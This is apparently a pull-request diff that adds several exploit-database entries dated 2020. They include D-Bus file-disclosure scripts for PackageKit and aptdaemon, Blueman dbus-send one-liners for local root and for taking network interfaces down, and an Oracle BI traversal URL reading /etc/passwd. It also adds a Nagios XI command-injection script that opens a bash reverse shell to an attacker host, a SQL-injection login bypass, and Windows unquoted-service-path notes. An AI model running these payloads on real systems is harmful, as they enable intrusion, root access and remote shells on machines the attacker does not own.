[pull] master from offensive-security:master

exploits/linux/local/48961.py

@@ -0,0 +1,62 @@
+# Exploit Title: File Existence Disclosure in PackageKit < 1.1.13-2ubuntu1
+# Date: 2020-10-27
+# Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl)
+# Vendor Homepage: https://www.freedesktop.org/software/PackageKit/
+# Software Link: https://www.freedesktop.org/software/PackageKit/
+# Version: <= 1.1.1+bzr982-0ubuntu32.1
+# Tested on: Ubuntu 20.04
+#
+#!/usr/bin/env python3
+#
+# Ubuntu 16.04 - 20.04 
+# PackageKit <= 1.1.13-2ubuntu1
+# Sensitive Information Disclosure
+# 
+#
+# Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html
+#
+# The InstallFiles, GetFilesLocal and GetDetailsLocal methods 
+# of the d-bus interface to PackageKit accesses given files 
+# before checking for authorization. This allows non-privileged 
+# users to learn the MIME type of any file on the system.
+# 
+# Example in attached Python script:
+# 
+# $ python3 test_file_exists_pk.py /root/.bashrc
+# File exists and is of MIME type: 'text/plain'
+# 
+# $ python3 test_file_exists_pk.py /root/.bashrca
+# File does not exist
+#
+#
+import dbus
+import os
+import sys
+import re
+
+if len(sys.argv) != 2:
+	print("Checks if file exists and returns MIME type")
+	print("Usage: %s <file>")
+	sys.exit(0)
+
+FILE_TO_CHECK = sys.argv[1]
+
+bus = dbus.SystemBus()
+apt_dbus_object = bus.get_object("org.freedesktop.PackageKit", "/org/freedesktop/PackageKit")
+apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.freedesktop.PackageKit")  
+
+trans = apt_dbus_interface.CreateTransaction()
+
+apt_trans_dbus_object = bus.get_object("org.freedesktop.PackageKit", trans)
+apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.freedesktop.PackageKit.Transaction")
+
+try:
+	apt_trans_dbus_interface.InstallFiles(0, [FILE_TO_CHECK])
+	# ALSO apt_trans_dbus_interface.GetFilesLocal([FILE_TO_CHECK])
+	# ALSO apt_trans_dbus_interface.GetDetailsLocal([FILE_TO_CHECK])
+except dbus.exceptions.DBusException as e:
+	if "No such file" in str(e):
+		print("File does not exist")
+	elif "MimeTypeNotSupported" in str(e):
+		result = re.search('MIME type (.*) not supported', str(e))
+		print("File exists and is of MIME type: " + result.group(1))

exploits/linux/local/48962.py

@@ -0,0 +1,73 @@
+# Exploit Title: File Existence Disclosure in aptdaemon <= 1.1.1+bzr982-0ubuntu32.1
+# Date: 2020-10-27
+# Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl)
+# Vendor Homepage: https://wiki.debian.org/aptdaemon
+# Software Link: https://wiki.debian.org/aptdaemon
+# Version: <= 1.1.1+bzr982-0ubuntu32.1
+# Tested on: Ubuntu 20.04
+#
+#!/usr/bin/env python3
+#
+# Ubuntu 16.04 - 20.04 
+# Debian 9 - 11
+# aptdaemon < 1.1.1+bzr982-0ubuntu32.1
+# Sensitive Information Disclosure
+# 
+# Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html
+#
+# There is no input validation on the Locale property in an 
+# apt transaction. An unprivileged user can supply a full path
+# to a writable directory, which lets aptd read a file as root. 
+# Having a symlink in place results in an error message if the 
+# file exists, and no error otherwise. This way an unprivileged 
+# user can check for the existence of any files on the system 
+# as root.
+#
+# This is a similar type of bug as CVE-2015-1323.
+#
+# 
+# $ ./test_file_exists.py /root/.bashrc
+# File Exists!
+# $ ./test_file_exists.py /root/.bashrca
+# File does not exist!
+#
+#
+
+import dbus
+import os
+import sys
+
+if len(sys.argv) != 2:
+	print("Checks if file exists")
+	print("Usage: %s <file>")
+	sys.exit(0)
+
+FILE_TO_CHECK = sys.argv[1]
+
+bus = dbus.SystemBus()
+apt_dbus_object = bus.get_object("org.debian.apt", "/org/debian/apt")
+apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.debian.apt")  
+
+# just use any valid .deb file
+trans = apt_dbus_interface.InstallFile("/var/cache/apt/archives/dbus_1.12.14-1ubuntu2.1_amd64.deb", False)
+
+apt_trans_dbus_object = bus.get_object("org.debian.apt", trans)
+apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.debian.apt.transaction")
+
+properties_manager = dbus.Interface(apt_trans_dbus_interface, 'org.freedesktop.DBus.Properties')
+
+os.mkdir("/tmp/a")
+os.mkdir("/tmp/a/LC_MESSAGES")
+os.symlink(FILE_TO_CHECK, "/tmp/a/LC_MESSAGES/aptdaemon.mo")
+
+try:
+	properties_manager.Set("org.debian.apt.transaction", "Locale", "/tmp/a.")
+except:
+	print("File Exists!")
+	pass
+else:
+	print("File does not exist!")
+
+os.unlink("/tmp/a/LC_MESSAGES/aptdaemon.mo")
+os.rmdir("/tmp/a/LC_MESSAGES")
+os.rmdir("/tmp/a")

exploits/linux/local/48963.txt

@@ -0,0 +1,54 @@
+# Exploit Title: Local Privilege Escalation in Blueman < 2.1.4
+# Date: 2020-10-27
+# Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl)
+# Vendor Homepage: https://github.com/blueman-project/blueman
+# Software Link: https://github.com/blueman-project/blueman
+# Version: < 2.1.4
+# Tested on: Ubuntu 20.04
+# CVE: CVE-2020-15238
+#
+# By default installed on Ubuntu 16.04 - 20.10 and
+# Debian 9 - 11
+#
+# Local root exploit when dhcpcd is used instead of dhclient
+# 
+# Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html
+#
+# 
+# The DhcpClient method of the d-bus interface to blueman-mechanism 
+# is prone to an argument injection vulnerability. 
+# On systems where the isc-dhcp-client package is removed 
+# and the dhcpcd package installed, this leads to Local 
+# Privilege Escalation to root from any unprivileged user. 
+# See attached python script for a working exploit. Or use 
+# this oneliner with a shellscript "/tmp/eye":
+
+dbus-send --print-reply --system --dest=org.blueman.Mechanism \
+/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
+string:"-c/tmp/eye"
+
+# This happens because the argument is not sanitized before 
+# being used as an argument to dhcpcd.
+# 
+# Also on default installations with isc-dhcp-client installed, 
+# this can lead to DoS attacks by bringing any interface down 
+# as follows:
+
+dbus-send --print-reply --system --dest=org.blueman.Mechanism \
+/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
+string:"ens33 down al"
+
+# Or allows users to attach XDP objects to an interface:
+
+dbus-send --print-reply --system --dest=org.blueman.Mechanism \
+/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
+string:"ens33 down al"
+dbus-send --print-reply --system --dest=org.blueman.Mechanism \
+/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
+string:"ens33 name a"
+dbus-send --print-reply --system --dest=org.blueman.Mechanism \
+/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
+string:"a xdp o /tmp/o"
+
+# This both happens because the argument is passed to "ip link" 
+# unsanitized.

exploits/linux/webapps/48964.txt

@@ -0,0 +1,15 @@
+# Exploit Title: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion
+# Date: 2020-10-27
+# Exploit Author: Ivo Palazzolo (@palaziv)
+# Reference: https://www.oracle.com/security-alerts/cpuoct2020.html
+# Vendor Homepage: https://www.oracle.com
+# Software Link: https://www.oracle.com/middleware/technologies/bi-enterprise-edition-downloads.html
+# Version: 5.5.0.0.0, 12.2.1.3.0, 12.2.1.4.0
+# Tested on: SUSE Linux Enterprise Server
+# CVE: CVE-2020-14864
+
+# Description
+A Directory Traversal vulnerability has been discovered in the 'getPreviewImage' function of Oracle Business Intelligence Enterprise Edition. The 'getPreviewImage' function is used to get a preview image of a previously uploaded theme logo. By manipulating the 'previewFilePath' URL parameter an attacker with access to the administration interface is able to read arbitrary system files.
+
+# PoC
+https://TARGET/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd

exploits/php/webapps/48959.py

@@ -0,0 +1,66 @@
+# Exploit Title: Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated)
+# Date: 10-27-2020
+# Vulnerability Discovery: Chris Lyne
+# Vulnerability Details: https://www.tenable.com/security/research/tra-2020-58
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
+# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
+# Software Link: https://www.nagios.com/downloads/nagios-xi/
+# Version: Nagios XI 5.7.3
+# Tested on: Ubuntu 20.04
+# CVE: CVE-2020-5791
+
+#!/usr/bin/python3
+
+import re
+import requests
+import sys
+import urllib.parse
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+# Credit: Chris Lyne for vulnerability discovery and original PoC
+
+if len(sys.argv) != 6:
+    print("[~] Usage : ./exploit.py https://NagiosXI_Host/, Username, Password, Attacker IP, Attacker Port")
+    exit()
+
+host = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+attacker_ip = sys.argv[4]
+attacker_port = sys.argv[5]
+
+login_url = host + "/nagiosxi/login.php"
+payload = ";/bin/bash -c 'bash -i >& /dev/tcp/{0}/{1} 0>&1';".format(attacker_ip, attacker_port)
+encoded_payload = urllib.parse.quote_plus(payload)
+
+
+def exploit():
+    s = requests.Session()
+    login_page = s.get(login_url)
+    nsp = re.findall('var nsp_str = "(.*?)"', login_page.text)
+
+    res = s.post(
+        login_url,
+        data={
+            'nsp': nsp,
+            'page': 'auth',
+            'debug': '',
+            'pageopt': 'login',
+            'redirect': '/nagiosxi/index.php?',
+            'username': username,
+            'password': password,
+            'loginButton': ''
+        },
+        verify=False,
+        allow_redirects=True
+    )
+
+    injection_url = host + "/nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file={0}".format(encoded_payload)
+    res = s.get(injection_url)
+
+    if res.status_code != 200:
+            print("[~] Failed to connect")
+
+if __name__ == '__main__':
+    exploit()

exploits/php/webapps/48960.txt

@@ -0,0 +1,33 @@
+# Exploit Title: CSE Bookstore Authentication Bypass
+# Date: 27/10/2020
+# Exploit Author: Alper Basaran
+# Vendor Homepage: https://projectworlds.in/
+# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
+# Version: 1.0
+# Tested on: Windows 10 Enterprise 1909
+
+
+CSE Bookstore is vulnerable to an authentication bypass vulnerability on the admin panel. 
+By default the admin panel is located at /admin.php and the administrator interface can be accessed by unauthorized users exploiting the SQL injection vulnerability.
+
+Payload: 
+Name: admin
+Pass: %' or '1'='1 
+
+Sample BurpSuite intercept:
+
+POST /bookstore/admin_verify.php HTTP/1.1
+Host: 192.168.20.131
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 60
+Origin: http://192.168.20.131
+Connection: close
+Referer: http://192.168.20.131/bookstore/admin.php
+Cookie: PHPSESSID=hmqnib0ihkvo235jor7mpfoupv
+Upgrade-Insecure-Requests: 1
+
+name=admin&pass=%25%27+or+%271%27%3D%271&submit=Submit+Query

exploits/windows/local/48965.txt

@@ -0,0 +1,34 @@
+# Exploit Title: EPSON 1.124 - 'seksmdb.exe' Unquoted Service Path
+# Discovery by: İsmail Önder Kaya
+# Discovery Date: 2020-10-27
+# Vendor Homepage: https://www.epson.co.uk/support?productID=10820&os=22#drivers_and_manuals
+# Tested Version: 1.124
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "EPSON_P2B" | findstr /i /v """
+
+SEcnStatutsDatabase        SENADB       C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmdb.exe           Auto
+
+# Service info:
+
+C:\>sc qc SENADB
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SENADB
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files (x86)\EPSON_P2B\Printer Software\Status Monitor\seksmdb.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : SEcnStatutsDatabase
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

exploits/windows/local/48966.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Program Access Controller v1.2.0.0 - 'PACService.exe' Unquoted Service Path
+# Date: 2020-8-25
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: https://www.gearboxcomputers.com/
+# Software Link: https://www.gearboxcomputers.com/files/ProgramAccessController.exe
+# Version: 1.2.0.0
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Service info:
+
+C:\Users\m507>sc qc PACSvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: PACSvc
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Program Access Controller\PACService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : PAC Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.